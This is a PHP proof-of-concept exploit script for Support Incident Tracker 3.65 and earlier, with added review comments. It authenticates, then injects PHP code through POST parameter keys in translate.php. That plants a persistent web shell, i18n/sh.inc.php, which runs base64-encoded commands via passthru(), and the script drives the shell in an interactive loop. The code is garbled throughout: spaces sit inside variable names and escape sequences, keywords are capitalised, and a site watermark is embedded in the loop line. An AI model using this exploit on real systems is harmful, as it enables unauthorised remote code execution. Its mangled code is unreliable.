<? Php
/*
------------------------------------------------------------------------------
Support Incident Tracker <= 3.65 (translate.php) Remote Code Execution Exploit
------------------------------------------------------------------------------
Author: Egidio Romano aka EgiX    n0b0d13s [at] gmail [dot] com
Link: http://sitracker.org/
Affected Versions: 3.45 to 3.65
+ ------------------------------------------------------------------------- +
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+ ------------------------------------------------------------------------- +
[-] Defect location: translate. php
234. foreach (array_keys($_POST) as $key)
235. {
236.     if (!empty($_POST[$key]) AND substr($key, 0, 3) == "str")
237.     {
238.         if ($lastchar != '' AND substr($key, 3, 1) != $lastchar) $i18nfile .= "\n";
239.         $i18nfile .= "\${$key} = '".addslashes($_POST[$key])."';\n";
240.         $lastchar = substr($key, 3, 1);
241.         $translatedcount++;
242.     }
243. }
Input passed via the keys of the $_POST array isn't sanitized before being appended to $i18nfile
at line 239: addslashes() is applied only to the posted value, while the key itself is interpolated
into PHP source verbatim (it only has to start with "str" and carry a non-empty value). $i18nfile
then becomes the contents of a language file written into the 'i18n' directory with a .php
extension, so an authenticated user can inject and execute arbitrary PHP code. Furthermore,
requesting /translate.php?mode=save directly reveals the full installation path of the application.
*/
// PoC housekeeping: hide PHP warnings (fsockopen / preg_* failures are
// reported by the script itself), let the interactive loop run without a
// time limit, and cap every socket wait at 5 seconds.
error_reporting(0);
set_time_limit(0);
ini_set('default_socket_timeout', 5);
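/**
 * Send one raw HTTP request and return the full response.
 *
 * Opens a plain TCP connection (no TLS) to $host on $port, writes $packet
 * verbatim and reads until the server closes the connection; every request
 * this script builds carries "Connection: close", so the read terminates.
 * The connect timeout is whatever default_socket_timeout is set to.
 *
 * @param string $host   target host name or IP
 * @param string $packet complete request, headers and body, CRLF-terminated
 * @param int    $port   TCP port; defaults to 80 as in the original
 * @return string raw response, status line and headers included
 *
 * Terminates the script (die) when the connection or the write fails.
 * The socket is closed on every path; the original left the handle open
 * until garbage collection, once per request in the shell loop.
 */
function http_send($host, $packet, $port = 80)
{
    $sock = fsockopen($host, $port);
    if (!$sock)
        die("\n[-] No response from {$host}:{$port}\n");

    if (fwrite($sock, $packet) === false)
    {
        fclose($sock);
        die("\n[-] Write failed to {$host}:{$port}\n");
    }

    $response = stream_get_contents($sock);
    fclose($sock);
    return $response;
}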
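// Banner.
print "\n+--------------------------------------------------------------------------+";
print "\n|  Support Incident Tracker <= 3.65 Remote Code Execution Exploit by EgiX  |";
print "\n+--------------------------------------------------------------------------+\n";

// Argument check. The script reads $argv[1]..$argv[4] (host, path, username,
// password) below, so $argc must be at least 5 counting the script name; the
// original "< 3" test let runs with missing credentials through and sent
// "username=&password=" to the target. The usage line was also truncated in
// the original text and is rebuilt here from the positional uses below.
// $path is concatenated directly with "login.php" etc., so it must end in "/".
if ($argc < 5)
{
    print "\nUsage......: php {$argv[0]} <host> <path> <username> <password>";
    print "\nExample....: php {$argv[0]} localhost / user pass";
    print "\nExample....: php {$argv[0]} localhost /sit/ user pass\n";
    die();
}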
// Positional arguments: host, path (must end with "/", it is concatenated
// with "login.php" below), then the credentials used to authenticate.
// NOTE(review): variable case is inconsistent in this text ($Host here,
// $host later); PHP variables are case-sensitive, so this looks like an
// extraction artifact — the script only works with one consistent spelling.
$ Host = $ argv [1];
$ Path = $ argv [2];
// Credentials go into the form body without urlencode(); a username or
// password containing '&' or '=' would corrupt the request.
$ Payload = "username = {$ argv [3]} & password = {$ argv [4]}";
// Step 1: authenticate. The vulnerable translate.php path is reached only
// with a valid session, so this is a post-authentication exploit. A
// placeholder SiTsessionID cookie is sent; the real session id is taken
// from the Set-Cookie header of the reply.
$ Packet = "POST {$ path} login. php HTTP/1.0 \ r \ n ";
$ Packet. = "Host: {$ host} \ r \ n ";
$ Packet. = "Cookie: SiTsessionID = foo \ r \ n ";
$ Packet. = "Content-Length:". strlen ($ payload). "\ r \ n ";
$ Packet. = "Content-Type: application/x-www-form-urlencoded \ r \ n ";
$ Packet. = "Connection: close \ r \ n {$ payload }";
$ Response = http_send ($ host, $ packet );
// Login is assumed successful when "main.php" appears anywhere in the
// response (presumably a redirect to it — not verified here).
If (! Preg_match ("/main. php/", $ response) die ("\ n [-] Login failed! \ N ");
// Captures the first Set-Cookie value up to ';' and reuses it verbatim as
// the Cookie header below; assumes the first Set-Cookie is the session id.
If (! Preg_match ("/Set-Cookie: ([^;] *);/", $ response, $ sid) die ("\ n [-] Session ID not found! \ N ");
// Step 2: plant the code. The injected PHP reads a command from the
// HTTP_CMD request header (base64), runs it with passthru() and prints the
// "___" marker that the shell loop below uses to delimit output.
$ Phpcode = base64_encode ('passthru (base64_decode ($ _ SERVER [HTTP_CMD]); print ("___");');
// The injection lives in the POST *key*, not the value: the key starts with
// "str" to pass the prefix check quoted in the header, then closes the
// generated assignment with ";" and appends eval(...) followed by "//" so
// the rest of the generated line is commented out. The value ("1") only
// has to be non-empty. "lang=sh" appears to select the output file name —
// the GET below fetches i18n/sh.inc.php.
$ Payload = "mode = save & lang = sh & str; eval (base64_decode ({$ phpcode}); // = 1 ";
$ Packet = "POST {$ path} translate. php HTTP/1.0 \ r \ n ";
$ Packet. = "Host: {$ host} \ r \ n ";
$ Packet. = "Cookie: {$ sid [1]} \ r \ n ";
$ Packet. = "Content-Length:". strlen ($ payload). "\ r \ n ";
$ Packet. = "Content-Type: application/x-www-form-urlencoded \ r \ n ";
$ Packet. = "Connection: close \ r \ n {$ payload }";
// The response is discarded, so a failed write is only noticed when the
// first command in the loop below fails.
// SECURITY NOTE: this request leaves a persistent PHP file (a web shell) in
// the target's i18n directory, and nothing in this script removes it.
// On an authorized test, delete i18n/sh.inc.php and report it as an artifact.
Http_send ($ host, $ packet );
// Step 3: interactive loop. Each command is sent base64-encoded in a custom
// "Cmd" header when fetching the planted language file.
// BUG: the request line below ends with "/r\n" — the slash should be a
// backslash ("\r\n"); as written the server receives a malformed request line.
$ Packet = "GET {$ path} i18n/sh. inc. php HTTP/1.0/r \ n ";
$ Packet. = "Host: {$ host} \ r \ n ";
// %s is filled by sprintf() below; base64 output never contains '%', and
// the rest of the packet has no '%' either, so the format string is safe.
$ Packet. = "Cmd: % s \ r \ n ";
$ Packet. = "Connection: close \ r \ n ";
// "www.2cto.com" on the next line is a scraping watermark, not code; it must
// be removed for the file to parse.
While (1) www.2cto.com
{
Print "\ nsit-shell #";
// Typing "exit" ends the loop. NOTE(review): EOF on stdin makes fgets()
// return false, which trim() turns into "", so the loop does not stop on
// EOF — it keeps sending empty commands.
If ($ cmd = trim (fgets (STDIN) = "exit") break;
$ Response = http_send ($ host, sprintf ($ packet, base64_encode ($ cmd )));
// Body is everything between the end of the headers ("\n\r\n") and the
// last "___" marker (greedy .* with the s modifier); any failure to match
// (no session, file not written, header stripped) aborts the script.
Preg_match ("/\ n \ r \ n (. *) ___/s", $ response, $ m )? Print $ m [1]: die ("\ n [-] Exploit failed! \ N ");
}
?>